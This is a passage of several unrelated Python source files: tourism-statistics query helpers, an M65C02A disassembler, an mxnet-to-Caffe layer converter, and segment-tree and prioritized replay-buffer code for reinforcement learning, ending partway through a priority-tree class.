    :param Anio: year
    :type Anio: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnAnio(Ciudad, Anio)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_turistas_entrantes_de_ciudad_origen_hacia_ciudad_destino_en_rango_anio_en_mes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes):
    """
    Total number of tourists travelling from CiudadOrigen to CiudadDestino,
    per year over [AnioInicio, AnioFin], restricted to the given month.

    :param CiudadDestino: destination city
    :type CiudadDestino: str
    :param CiudadOrigen: origin city
    :type CiudadOrigen: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :param Mes: month
    :type Mes: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAniosEnMes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_anio_mensualmente(Ciudad, Anio):
    """
    Number of incoming tourists arriving at a city, broken down by month,
    for the given year.

    :param Ciudad: destination city
    :type Ciudad: str
    :param Anio: year
    :type Anio: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnAnioMensualmente(Ciudad, Anio)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_porcentaje_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_anio(CiudadDestino, CiudadOrigen, Anio):
    """
    Annual percentage of incoming tourists arriving at CiudadDestino from
    CiudadOrigen during the given year.

    :param CiudadDestino: destination city
    :type CiudadDestino: str
    :param CiudadOrigen: origin city
    :type CiudadOrigen: str
    :param Anio: year
    :type Anio: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerPorcentajeTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnAnio(CiudadDestino, CiudadOrigen, Anio)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_rango_anio_en_mes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes):
    """
    Total number of tourists leaving CiudadOrigen for CiudadDestino,
    per year over [AnioInicio, AnioFin], restricted to the given month.

    NOTE(review): calls the same repository query as
    obtener_cantidad_turistas_entrantes_de_ciudad_origen_hacia_ciudad_destino_en_rango_anio_en_mes
    -- the two functions appear to be duplicates; confirm which callers use which.

    :param CiudadDestino: destination city
    :type CiudadDestino: str
    :param CiudadOrigen: origin city
    :type CiudadOrigen: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :param Mes: month
    :type Mes: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAniosEnMes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_porcentaje_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_rango_anios(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin):
    """
    Annual percentage of incoming tourists arriving at CiudadDestino from
    CiudadOrigen over the year range [AnioInicio, AnioFin].

    :param CiudadDestino: destination city
    :type CiudadDestino: str
    :param CiudadOrigen: origin city
    :type CiudadOrigen: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerPorcentajeTotalTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAnios(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_rango_anios(Ciudad, AnioInicio, AnioFin):
    """
    Total number of incoming tourists arriving at a city over the year
    range [AnioInicio, AnioFin].

    :param Ciudad: destination city
    :type Ciudad: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnRangoAnios(Ciudad, AnioInicio, AnioFin)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_rango_anios_en_mes(Ciudad, AnioInicio, AnioFin, Mes):
    """
    Total number of incoming tourists arriving at a city over the year
    range [AnioInicio, AnioFin], restricted to the given month.

    :param Ciudad: destination city
    :type Ciudad: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :param Mes: month
    :type Mes: str
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnRangoAniosEnMes(Ciudad, AnioInicio, AnioFin, Mes)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_rango_anios_mensualmente(Ciudad, AnioInicio, AnioFin):
    """
    Number of incoming tourists arriving at a city over the year range
    [AnioInicio, AnioFin], broken down by month.

    :param Ciudad: destination city
    :type Ciudad: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnRangoAniosMensualmente(Ciudad, AnioInicio, AnioFin)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
|
# py65/disassemblerM65C02A.py
from utils.addressing import AddressParser
class Disassembler:
    """Disassembler for M65C02A machine code.

    Reads instruction bytes through the supplied ``mpu`` (via ``rdDM`` /
    ``WordAt``) and renders them as assembler text, resolving addresses to
    labels through ``address_parser`` when one is known.

    Fix vs. original: a stray debug ``print`` in the 'zprel' branch has been
    removed; the repeated operand-decoding code is factored into helpers.
    """

    def __init__(self, mpu, address_parser=None):
        if address_parser is None:
            address_parser = AddressParser()

        self._mpu = mpu
        self._address_parser = address_parser

        # Cache widths/formats from the MPU so formatting is uniform below.
        self.addrWidth = mpu.ADDR_WIDTH
        self.byteWidth = mpu.BYTE_WIDTH
        if mpu.BYTE_WIDTH == 8:
            self.wordWidth = 16
        else:
            self.wordWidth = 32
        self.addrFmt = mpu.ADDR_FORMAT
        self.byteFmt = mpu.BYTE_FORMAT
        if mpu.BYTE_WIDTH == 8:
            self.wordFmt = '%04X'
        else:
            self.wordFmt = '%08X'
        self.addrMask = (1 << self.addrWidth) - 1
        self.byteMask = (1 << self.byteWidth) - 1
        self.wordMask = (1 << self.wordWidth) - 1

    def _zp_label(self, pc):
        """Return the label (or '$xx' literal) for the zero-page operand at pc+1."""
        zp_address = self._mpu.rdDM(pc + 1)
        return self._address_parser.label_for(
            zp_address, '$' + self.byteFmt % zp_address)

    def _abs_label(self, pc):
        """Return the label (or '$xxxx' literal) for the absolute operand at pc+1."""
        address = self._mpu.WordAt(pc + 1)
        return self._address_parser.label_for(
            address, '$' + self.addrFmt % address)

    def _branch_label(self, base, opv, width, mask):
        """Resolve a relative branch displacement to a target label.

        ``opv`` is a two's-complement displacement of ``width`` bits applied
        to ``base`` (the address of the next instruction).
        """
        targ = base
        if opv & (1 << (width - 1)):
            # Negative displacement: undo two's complement.
            targ -= (opv ^ mask) + 1
        else:
            targ += opv
        targ &= self.addrMask
        return self._address_parser.label_for(targ, '$' + self.addrFmt % targ)

    def instruction_at(self, pc):
        """ Disassemble the instruction at PC and return a tuple
        containing (instruction byte count, human readable text)
        """
        instruction = self._mpu.rdDM(pc)
        disasm, addressing = self._mpu.disassemble[instruction]

        if addressing == 'acc':
            disasm += ' A'
            length = 1
        elif addressing == 'imp':
            length = 1
        elif addressing == 'imm':
            disasm += ' #$' + self.byteFmt % self._mpu.rdDM(pc + 1)
            length = 2
        elif addressing == 'zp':
            disasm += ' %s' % self._zp_label(pc)
            length = 2
        elif addressing == 'zpX':
            disasm += ' %s,X' % self._zp_label(pc)
            length = 2
        elif addressing == 'zpY':
            disasm += ' %s,Y' % self._zp_label(pc)
            length = 2
        elif addressing == 'zpI':
            # Note: the parenthesised form is the *fallback* text here, so a
            # known label replaces the whole '(...)' operand.
            zp_address = self._mpu.rdDM(pc + 1)
            disasm += ' %s' % self._address_parser.label_for(
                zp_address, '($' + self.byteFmt % zp_address + ')')
            length = 2
        elif addressing == 'zpIY':
            disasm += ' (%s),Y' % self._zp_label(pc)
            length = 2
        elif addressing == 'zpXI':
            disasm += ' (%s,X)' % self._zp_label(pc)
            length = 2
        elif addressing == 'abs':
            disasm += ' ' + self._abs_label(pc)
            length = 3
        elif addressing == 'absX':
            disasm += ' %s,X' % self._abs_label(pc)
            length = 3
        elif addressing == 'absY':
            disasm += ' %s,Y' % self._abs_label(pc)
            length = 3
        elif addressing == 'absI':
            disasm += ' (%s)' % self._abs_label(pc)
            length = 3
        elif addressing == 'absXI':
            disasm += ' (%s,X)' % self._abs_label(pc)
            length = 3
        elif addressing == 'rel':
            opv = self._mpu.rdDM(pc + 1)
            disasm += ' ' + self._branch_label(
                pc + 2, opv, self.byteWidth, self.byteMask)
            length = 2
        elif addressing == 'zprel':
            # Zero-page operand followed by a relative branch target.
            disasm += ' %s' % self._zp_label(pc)
            opv = self._mpu.rdDM(pc + 2)
            disasm += ',' + self._branch_label(
                pc + 3, opv, self.byteWidth, self.byteMask)
            length = 3
        elif addressing == 'rel16':
            opv = self._mpu.WordAt(pc + 1)
            disasm += ' ' + self._branch_label(
                pc + 3, opv, self.wordWidth, self.wordMask)
            length = 3
        elif addressing == 'ipp':
            disasm += ' %s,I' % self._zp_label(pc)
            length = 2
        return (length, disasm)
|
# Copyright 2018 Argo AI, LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Generate caffe layer according to mxnet config.
"""
import constants
from ast import literal_eval
from caffe import layers
from caffe import params
def make_list(str_inp):
    """Create a list from a string of numbers.

    Args:
        str_inp (str): Expression to convert to a list, e.g. "(1, 2)" or "3".

    Returns:
        list: Converted list; a scalar expression yields a one-element list.
    """
    val = literal_eval(str_inp)
    if not isinstance(val, tuple):
        # Scalars such as "3" evaluate to a bare value; wrap for uniform shape.
        val = (val,)
    return list(val)
def get_caffe_layer(node, net, input_dims):
    """Generate caffe layer for corresponding mxnet op.

    Args:
        node (iterable from MxnetParser): Mxnet op summary generated by MxnetParser
        net (caffe.net): Caffe netspec object
        input_dims (sequence): Input spatial dimensions; used to convert
            MultiBoxPrior's relative sizes and steps to absolute pixels.

    Returns:
        caffe.layers: Equivalent caffe layer, or None for an unhandled op type.

    Raises:
        ValueError: If a Pooling node requests an unsupported pool_type.
    """
    if node['type'] == 'Convolution':
        assert len(node['inputs']) == 1, \
            'Convolution layers can have only one input'
        conv_params = node['attr']
        kernel_size = make_list(conv_params['kernel'])
        num_filters = make_list(conv_params['num_filter'])[0]
        # Stride and dilation are optional in mxnet; caffe needs explicit values.
        if 'stride' in conv_params:
            stride = make_list(conv_params['stride'])[0]
        else:
            stride = 1
        padding = make_list(conv_params['pad'])
        if 'dilate' in conv_params:
            dilation = make_list(conv_params['dilate'])[0]
        else:
            dilation = 1
        convolution_param = {'pad': padding,
                             'kernel_size': kernel_size,
                             'num_output': num_filters,
                             'stride': stride,
                             'dilation': dilation}
        return layers.Convolution(net[node['inputs'][0]],
                                  convolution_param=convolution_param)
    if node['type'] == 'Activation':
        assert len(node['inputs']) == 1, \
            'Activation layers can have only one input'
        # Only ReLU activations are supported by this converter.
        assert node['attr']['act_type'] == 'relu'
        return layers.ReLU(net[node['inputs'][0]])
    if node['type'] == 'Pooling':
        assert len(node['inputs']) == 1, \
            'Pooling layers can have only one input'
        kernel_size = make_list(node['attr']['kernel'])
        stride = make_list(node['attr']['stride'])
        pooling_type = node['attr']['pool_type']
        if 'pad' in node['attr']:
            padding = make_list(node['attr']['pad'])
        else:
            padding = [0]
        if pooling_type == 'max':
            pooling = params.Pooling.MAX
        elif pooling_type == 'avg':
            pooling = params.Pooling.AVG
        else:
            # Previously an unknown pool_type fell through and raised a
            # confusing UnboundLocalError on `pooling`; fail fast instead.
            raise ValueError('Unsupported pool_type: %s' % pooling_type)
        pooling_param = {'pool': pooling, 'pad': padding[0],
                         'kernel_size': kernel_size[0], 'stride': stride[0]}
        return layers.Pooling(net[node['inputs'][0]],
                              pooling_param=pooling_param)
    if node['type'] == 'L2Normalization':
        across_spatial = node['attr']['mode'] != 'channel'
        channel_shared = False
        scale_filler = {
            'type': "constant",
            'value': constants.NORMALIZATION_FACTOR
        }
        norm_param = {'across_spatial': across_spatial,
                      'scale_filler': scale_filler,
                      'channel_shared': channel_shared}
        return layers.Normalize(net[node['inputs'][0]],
                                norm_param=norm_param)
    # Note - this layer has been implemented
    # only in WeiLiu's ssd branch of caffe not in caffe master
    if node['type'] == 'transpose':
        order = make_list(node['attr']['axes'])
        return layers.Permute(net[node['inputs'][0]],
                              permute_param={'order': order})
    if node['type'] == 'Flatten':
        # Anchor tensors keep an extra leading dim; everything else flattens to 2-D.
        if node['inputs'][0].endswith('anchors'):
            axis = 2
        else:
            axis = 1
        return layers.Flatten(net[node['inputs'][0]],
                              flatten_param={'axis': axis})
    if node['type'] == 'Concat':
        # In the ssd model, always concatenate along last axis,
        # since anchor boxes have an extra dimension in caffe (that includes variance).
        axis = -1
        concat_inputs = [net[inp] for inp in node['inputs']]
        return layers.Concat(*concat_inputs, concat_param={'axis': axis})
    if node['type'] == 'Reshape':
        if node['name'] == 'multibox_anchors':
            # Caffe prior boxes are laid out as (1, 2, -1): boxes + variances.
            reshape_dims = [1, 2, -1]
        else:
            reshape_dims = make_list(node['attr']['shape'])
        return layers.Reshape(net[node['inputs'][0]],
                              reshape_param={'shape': {'dim': reshape_dims}})
    if node['type'] == '_contrib_MultiBoxPrior':
        priorbox_inputs = [net[inp] for inp in node['inputs']] + [net["data"]]
        # Scale the relative sizes/steps by the input dimension to get pixels.
        sizes = make_list(node["attr"]["sizes"])
        min_size = sizes[0] * input_dims[0]
        max_size = int(round((sizes[1] * input_dims[0]) ** 2 / min_size))
        aspect_ratio = make_list(node["attr"]["ratios"])
        steps = make_list(node["attr"]["steps"])
        param = {'clip': node["attr"]["clip"] == "true",
                 'flip': False,
                 'min_size': min_size,
                 'max_size': max_size,
                 'aspect_ratio': aspect_ratio,
                 'variance': [0.1, 0.1, 0.2, 0.2],
                 'step': int(round(steps[0] * input_dims[0])),
                 }
        return layers.PriorBox(*priorbox_inputs, prior_box_param=param)
    if node['type'] == '_contrib_MultiBoxDetection':
        multibox_inputs = [net[inp] for inp in node['inputs']]
        # Reorder bottoms for DetectionOutput; presumably mxnet emits
        # (conf, loc, prior) while caffe expects (loc, conf, prior) -- TODO confirm.
        bottom_order = [1, 0, 2]
        multibox_inputs = [multibox_inputs[i] for i in bottom_order]
        param = {
            'num_classes': constants.NUM_CLASSES,
            'share_location': True,
            'background_label_id': 0,
            'nms_param': {
                'nms_threshold': float(node['attr']['nms_threshold']),
                'top_k': int(node['attr']['nms_topk'])
            },
            'keep_top_k': make_list(node['attr']['nms_topk'])[0],
            'confidence_threshold': 0.01,
            'code_type': params.PriorBox.CENTER_SIZE,
        }
        return layers.DetectionOutput(*multibox_inputs, detection_output_param=param)
    if node['type'] in ['SoftmaxActivation', 'SoftmaxOutput']:
        # 'channel' mode (or no mode at all) softmaxes over axis 1; otherwise axis 0.
        if 'mode' not in node['attr'] or node['attr']['mode'] == 'channel':
            axis = 1
        else:
            axis = 0
        # note: caffe expects confidence scores to be flattened before detection output layer receives it
        return layers.Flatten(layers.Permute(layers.Softmax(net[node['inputs'][0]],
                                                            axis=axis),
                                             permute_param={'order': [0, 2, 1]}),
                              flatten_param={'axis': 1})
|
# gh_stars: 1-10
import numpy as np
import random
import torch
from collections import namedtuple, deque
import math
#code from openai
#https://github.com/openai/baselines/blob/master/baselines/deepq/replay_buffer.py
import operator
class SegmentTree(object):
    def __init__(self, capacity, operation, neutral_element):
        """Build a Segment Tree data structure.

        https://en.wikipedia.org/wiki/Segment_tree

        Can be used as a regular array, but with two
        important differences:

            a) setting an item's value is slightly slower:
               O(lg capacity) instead of O(1).
            b) the user has access to an efficient `reduce`
               operation which reduces `operation` over
               a contiguous subsequence of items in the array.

        Parameters
        ----------
        capacity: int
            Total size of the array - must be a power of two.
        operation: lambda obj, obj -> obj
            an operation for combining elements (eg. sum, max);
            must form a mathematical group together with the set of
            possible values for array elements.
        neutral_element: obj
            neutral element for the operation above, eg. float('-inf')
            for max and 0 for sum.
        """
        assert capacity > 0 and capacity & (capacity - 1) == 0, "capacity must be positive and a power of 2."
        self._capacity = capacity
        # Flat binary-heap layout: node i has children 2*i and 2*i+1;
        # leaves live at indices [capacity, 2*capacity).
        self._value = [neutral_element for _ in range(2 * capacity)]
        self._operation = operation

    def _reduce_helper(self, start, end, node, node_start, node_end):
        # Recursively combine values over the inclusive range [start, end],
        # using the tree node that covers [node_start, node_end].
        if start == node_start and end == node_end:
            return self._value[node]
        mid = (node_start + node_end) // 2
        if end <= mid:
            # Query range lies entirely in the left child.
            return self._reduce_helper(start, end, 2 * node, node_start, mid)
        else:
            if mid + 1 <= start:
                # Query range lies entirely in the right child.
                return self._reduce_helper(start, end, 2 * node + 1, mid + 1, node_end)
            else:
                # Query straddles both children: combine the two halves.
                return self._operation(
                    self._reduce_helper(start, mid, 2 * node, node_start, mid),
                    self._reduce_helper(mid + 1, end, 2 * node + 1, mid + 1, node_end)
                )

    def reduce(self, start=0, end=None):
        """Returns result of applying `self.operation`
        to a contiguous subsequence of the array.

            self.operation(arr[start], operation(arr[start+1], operation(... arr[end])))

        Parameters
        ----------
        start: int
            beginning of the subsequence
        end: int
            end of the subsequence (exclusive; defaults to the whole array)

        Returns
        -------
        reduced: obj
            result of reducing self.operation over the specified range of array elements.
        """
        if end is None:
            end = self._capacity
        if end < 0:
            # Negative bounds count from the end, like regular sequences.
            end += self._capacity
        # Convert the exclusive bound to the inclusive bound _reduce_helper expects.
        end -= 1
        return self._reduce_helper(start, end, 1, 0, self._capacity - 1)

    def __setitem__(self, idx, val):
        # index of the leaf
        idx += self._capacity
        self._value[idx] = val
        # Walk up to the root, recombining each parent from its two children.
        idx //= 2
        while idx >= 1:
            self._value[idx] = self._operation(
                self._value[2 * idx],
                self._value[2 * idx + 1]
            )
            idx //= 2

    def __getitem__(self, idx):
        # Leaves are stored contiguously starting at offset _capacity.
        assert 0 <= idx < self._capacity
        return self._value[self._capacity + idx]
class SumSegmentTree(SegmentTree):
    # Segment tree specialised to range sums (operation=add, neutral element 0).
    def __init__(self, capacity):
        super(SumSegmentTree, self).__init__(
            capacity=capacity,
            operation=operator.add,
            neutral_element=0.0
        )

    def sum(self, start=0, end=None):
        """Returns arr[start] + ... + arr[end]"""
        return super(SumSegmentTree, self).reduce(start, end)

    def find_prefixsum_idx(self, prefixsum):
        """Find the highest index `i` in the array such that
            sum(arr[0] + arr[1] + ... + arr[i - 1]) <= prefixsum

        If array values are probabilities, this function
        allows to sample indexes according to the discrete
        probability efficiently.

        Parameters
        ----------
        prefixsum: float
            upperbound on the sum of array prefix

        Returns
        -------
        idx: int
            highest index satisfying the prefixsum constraint
        """
        assert 0 <= prefixsum <= self.sum() + 1e-5
        idx = 1
        # Descend left when the left subtree holds enough mass; otherwise
        # subtract that mass and descend right.
        while idx < self._capacity: # while non-leaf
            if self._value[2 * idx] > prefixsum:
                idx = 2 * idx
            else:
                prefixsum -= self._value[2 * idx]
                idx = 2 * idx + 1
        return idx - self._capacity
class MinSegmentTree(SegmentTree):
    """Segment tree specialised for range-minimum queries."""

    def __init__(self, capacity):
        # Neutral element is +inf so empty ranges never win the minimum.
        super().__init__(
            capacity=capacity, operation=min, neutral_element=float('inf'))

    def min(self, start=0, end=None):
        """Return min(arr[start], ..., arr[end])."""
        return super().reduce(start, end)
class ReplayBuffer(object):
    """Fixed-size cyclic buffer of transitions for experience replay."""

    def __init__(self, size):
        """Create Replay buffer.

        Parameters
        ----------
        size: int
            Max number of transitions to store in the buffer. When the buffer
            overflows the old memories are dropped.
        """
        self._storage = []
        self._maxsize = size
        self._next_idx = 0

    def __len__(self):
        return len(self._storage)

    def push(self, state, action, reward, next_state, done):
        """Insert one transition, overwriting the oldest entry once full."""
        transition = (state, action, reward, next_state, done)
        if self._next_idx < len(self._storage):
            self._storage[self._next_idx] = transition
        else:
            self._storage.append(transition)
        self._next_idx = (self._next_idx + 1) % self._maxsize

    def _encode_sample(self, idxes):
        # Gather the selected transitions and split them into per-field arrays.
        batch = [self._storage[i] for i in idxes]
        states = np.array([np.array(t[0], copy=False) for t in batch])
        actions = np.array([np.array(t[1], copy=False) for t in batch])
        rewards = np.array([t[2] for t in batch])
        next_states = np.array([np.array(t[3], copy=False) for t in batch])
        dones = np.array([t[4] for t in batch])
        return states, actions, rewards, next_states, dones

    def sample(self, batch_size):
        """Sample a batch of experiences uniformly (with replacement).

        Parameters
        ----------
        batch_size: int
            How many transitions to sample.

        Returns
        -------
        (obs_batch, act_batch, rew_batch, next_obs_batch, done_mask):
            numpy arrays, one per transition field; done_mask[i] is truthy if
            act_batch[i] ended its episode.
        """
        picks = [random.randint(0, len(self._storage) - 1)
                 for _ in range(batch_size)]
        return self._encode_sample(picks)
class PrioritizedReplayBuffer(ReplayBuffer):
    def __init__(self, size, alpha):
        """Create Prioritized Replay buffer.

        Parameters
        ----------
        size: int
            Max number of transitions to store in the buffer. When the buffer
            overflows the old memories are dropped.
        alpha: float
            how much prioritization is used
            (0 - no prioritization, 1 - full prioritization)

        See Also
        --------
        ReplayBuffer.__init__
        """
        super(PrioritizedReplayBuffer, self).__init__(size)
        assert alpha > 0
        self._alpha = alpha

        # Segment trees require a power-of-two capacity; round up.
        it_capacity = 1
        while it_capacity < size:
            it_capacity *= 2

        # Sum tree drives proportional sampling; min tree gives the smallest
        # probability, needed to normalise importance weights.
        self._it_sum = SumSegmentTree(it_capacity)
        self._it_min = MinSegmentTree(it_capacity)
        self._max_priority = 1.0

    def push(self, *args, **kwargs):
        """See ReplayBuffer.push; new transitions get the max priority seen."""
        idx = self._next_idx
        super(PrioritizedReplayBuffer, self).push(*args, **kwargs)
        self._it_sum[idx] = self._max_priority ** self._alpha
        self._it_min[idx] = self._max_priority ** self._alpha

    def _sample_proportional(self, batch_size):
        # Draw indices with probability proportional to their priority mass.
        res = []
        for _ in range(batch_size):
            # TODO(szymon): should we ensure no repeats?
            mass = random.random() * self._it_sum.sum(0, len(self._storage) - 1)
            idx = self._it_sum.find_prefixsum_idx(mass)
            res.append(idx)
        return res

    def sample(self, batch_size, beta):
        """Sample a batch of experiences.

        Compared to ReplayBuffer.sample
        it also returns importance weights and idxes
        of sampled experiences.

        Parameters
        ----------
        batch_size: int
            How many transitions to sample.
        beta: float
            To what degree to use importance weights
            (0 - no corrections, 1 - full correction)

        Returns
        -------
        obs_batch: np.array
            batch of observations
        act_batch: np.array
            batch of actions executed given obs_batch
        rew_batch: np.array
            rewards received as results of executing act_batch
        next_obs_batch: np.array
            next set of observations seen after executing act_batch
        done_mask: np.array
            done_mask[i] = 1 if executing act_batch[i] resulted in
            the end of an episode and 0 otherwise.
        weights: np.array
            Array of shape (batch_size,) and dtype np.float32
            denoting importance weight of each sampled transition
        idxes: np.array
            Array of shape (batch_size,) and dtype np.int32
            indexes in buffer of sampled experiences
        """
        assert beta > 0

        idxes = self._sample_proportional(batch_size)

        # Importance-sampling weight (P(i)*N)^-beta, normalised by the
        # maximum possible weight (from the minimum-probability sample).
        weights = []
        p_min = self._it_min.min() / self._it_sum.sum()
        max_weight = (p_min * len(self._storage)) ** (-beta)

        for idx in idxes:
            p_sample = self._it_sum[idx] / self._it_sum.sum()
            weight = (p_sample * len(self._storage)) ** (-beta)
            weights.append(weight / max_weight)
        weights = np.array(weights)
        encoded_sample = self._encode_sample(idxes)
        return tuple(list(encoded_sample) + [weights, idxes])

    def update_priorities(self, idxes, priorities):
        """Update priorities of sampled transitions.

        sets priority of transition at index idxes[i] in buffer
        to priorities[i].

        Parameters
        ----------
        idxes: [int]
            List of idxes of sampled transitions
        priorities: [float]
            List of updated priorities corresponding to
            transitions at the sampled idxes denoted by
            variable `idxes`.
        """
        assert len(idxes) == len(priorities)
        for idx, priority in zip(idxes, priorities):
            assert priority > 0
            assert 0 <= idx < len(self._storage)
            self._it_sum[idx] = priority ** self._alpha
            self._it_min[idx] = priority ** self._alpha

            # Track the largest priority so far; used for new transitions.
            self._max_priority = max(self._max_priority, priority)
"""
Priority Tree.
3 tiered tree structure containing
Root node (Object. sum of all lower values)
Intermediate Node (Object. Root as parent, sums a given slice of the priority array)
Priority Array (Array of priorities, length buffer_size)
The number of Intermediate nodes is calculated by the buffer_size / batch_size.
I_episode: current episode of training
Index: is calculated by i_episode % buffer_size. This loops the index after exceeding the buffer_size.
Indicies: (List) of memory/priority entries
intermediate_dict: maps index to intermediate node. Since each Intermediate node is responsible
for a given slice of the priority array, given a particular index, it will return the Intermediate node
'responsible' for that index.
## Functions:
Add:
Calculates the priority of each TD error -> (abs(TD_error)+epsilon)**alpha
Stores the priority in the Priority_array.
Updates the sum_tree with the new priority
Update_Priorities:
Updates the index with the latest priority of that sample. As priorities can change over training
for a particular experience
Sample:
Splits the current priority_array based on the number of entries, by the batch_size.
Returns the indicies of those samples and the priorities.
Propogate:
Propogates the new priority value up through the tree
"""
class PriorityTree(object):
    # Three-tier sum structure: root <- intermediate nodes <- priority array.
    # See the module docstring above this class for the full description.
    def __init__(self,buffer_size,batch_size,alpha,epsilon):
        self.alpha = alpha
        self.epsilon = epsilon
        self.buffer_size = buffer_size
        self.batch_size = batch_size
        # One intermediate node per batch_size-wide slice of the priority array.
        self.num_intermediate_nodes = math.ceil(buffer_size / batch_size)
        self.current_intermediate_node = 0
        self.root = Node(None)
        self.intermediate_nodes = [Intermediate(self.root,batch_size*x,batch_size*(x+1)) for x in range(self.num_intermediate_nodes)]
        self.priority_array = np.zeros(buffer_size)
        # Map each array index to the intermediate node owning its slice.
        self.intermediate_dict = {}
        for index,node in enumerate(self.intermediate_nodes):
            for key in range((batch_size*(index+1))-batch_size,batch_size*(index+1)):
                self.intermediate_dict[key] = node
        print('Priority Tree: Batch Size {} Buffer size {} Number of intermediate Nodes {}'.format(batch_size,buffer_size,self.num_intermediate_nodes))

    def add(self,TD_error,index):
        """Store the priority derived from TD_error at index and update sums."""
        priority = (abs(TD_error)+self.epsilon)**self.alpha
        self.priority_array[index] = priority
        # Update sum
        propogate(self.intermediate_dict[index],self.priority_array)

    def sample(self,index):
        # Sample one experience uniformly from each slice of the priorities.
        # NOTE(review): `index` appears to be the count of entries stored so
        # far -- once it reaches buffer_size the full array is sampled; before
        # that, only the filled prefix is partitioned. TODO confirm with caller.
        if index >= self.buffer_size:
            indicies = [random.sample(list(range(sample*self.num_intermediate_nodes,(sample+1)*self.num_intermediate_nodes)),1)[0] for sample in range(self.batch_size)]
        else:
            interval = int(index / self.batch_size)
